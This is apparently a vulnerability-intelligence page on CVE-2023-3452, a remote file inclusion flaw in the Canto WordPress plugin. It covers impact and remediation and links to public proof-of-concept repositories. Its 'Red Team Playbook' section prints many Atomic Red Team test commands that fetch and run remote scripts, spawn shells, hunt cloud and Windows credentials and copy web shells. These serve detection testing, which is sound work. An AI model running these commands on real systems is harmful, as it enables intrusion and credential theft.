CVE-2023-3452
Overview
This vulnerability is a Remote File Inclusion (RFI) flaw rooted in improper validation of the 'wp_abspath' parameter within the Canto plugin for WordPress. The plugin's file inclusion logic fails to restrict external URLs, allowing inclusion of remote resources when PHP's allow_url_include directive is enabled. Additionally, a Local File Inclusion (LFI) vector exists, relying on the ability to upload malicious PHP files accessible by the web server. The affected component is the Canto plugin versions up to and including 3.0.4.
Vulnerability Description
The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.
Impact
An unauthenticated attacker can exploit the RFI vulnerability to execute arbitrary code remotely, potentially taking full control of the affected server. The attack requires no user interaction or authentication and network access to the vulnerable WordPress instance. The LFI variant demands the attacker first upload a malicious PHP file, which may be less feasible. Successful exploitation can lead to complete compromise of confidentiality, integrity, and availability of the system, as reflected in the CVSS vector (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H).
Solution
Users should upgrade the Canto WordPress plugin to a version later than 3.0.4 where this vulnerability is addressed. Detailed patch information and remediation steps are available in the WordPress plugin repository changelogs and the advisory published by Wordfence (https://www.wordfence.com/threat-intel/vulnerabilities/id/a76077c6-700a-4d21-a930-b0d6455d959c). Disabling PHP's allow_url_include directive can mitigate exploitation risk in the interim.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Canto plugin for WordPress is characterized by a Remote File Inclusion (RFI) flaw that can be exploited through the manipulation of the 'wp_abspath' parameter. This vulnerability exists in versions up to and including 3.0.4 of the plugin. When the server configuration allows for the 'allow_url_include' directive to be enabled, an attacker can craft a request that includes a remote file, leading to the execution of arbitrary code on the server. This scenario poses a significant risk, as it allows unauthorized individuals to execute malicious scripts, potentially compromising the entire web application and the underlying server.
Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker can send specially crafted HTTP requests to the affected WordPress site, targeting the vulnerable parameter. If successful, the attacker can include a remote file hosted on an external server, which could contain malicious PHP code. Additionally, while Local File Inclusion (LFI) is also possible, it requires the attacker to have some level of access to upload files to the server, making RFI the more critical threat in this context. Attackers could leverage this vulnerability to gain control over the web server, exfiltrate sensitive data, or deploy additional malware to further compromise the system.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on the Canto plugin for their WordPress sites. Successful exploitation can lead to unauthorized access to sensitive data, defacement of websites, or even complete server takeover. The business risks associated with such incidents include financial losses, reputational damage, and potential legal ramifications, especially if customer data is compromised. Organizations may also face regulatory scrutiny depending on the nature of the data involved and the jurisdictions in which they operate. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it should be prioritized for remediation.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to ensure that the Canto plugin is updated to the latest version, as this may contain patches that address the vulnerability. Regularly auditing and monitoring web application logs can help identify unusual patterns of access that may indicate exploitation attempts. Additionally, disabling the 'allow_url_include' directive in the server's PHP configuration can significantly reduce the risk of RFI attacks. Employing a web application firewall (WAF) can also provide an additional layer of security by filtering out malicious requests before they reach the application.
In conclusion, the Remote File Inclusion vulnerability in the Canto plugin for WordPress presents a significant threat to web applications that utilize this software. The potential for unauthorized code execution highlights the need for vigilant security practices, including timely updates, configuration hardening, and proactive monitoring. By understanding the nature of the vulnerability and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks posed by this and similar vulnerabilities in the future.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Canto | Canto | All |
cpe:2.3:a:canto:canto:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
leoanggal1/CVE-2023-3452-PoC
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
|
leoanggal1 | 17 | 1 | 2023-11-05 | View |
|
Alpastx/CVE-2023-3452---WordPress-Canto-Plugin-RCE
CVE-2023-3452 exploit for WordPress Canto plugin RCE, HTTPS support included
|
Alpastx | 0 | 0 | 2026-03-03 | View |
|
puppetma4ster/Metasploit-Wordpress-Canto-Exploit-RCE
this is a metasploit exploit module for CVE-2024-25096 and CVE-2023-3452
|
puppetma4ster | 0 | 0 | 2026-03-06 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-3452 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/a76077c6-700a-4d21-a930-b0d6455d959c?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/tree.php?rev=2841358#L5 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/2951888/canto/trunk/includes/lib/tree.php |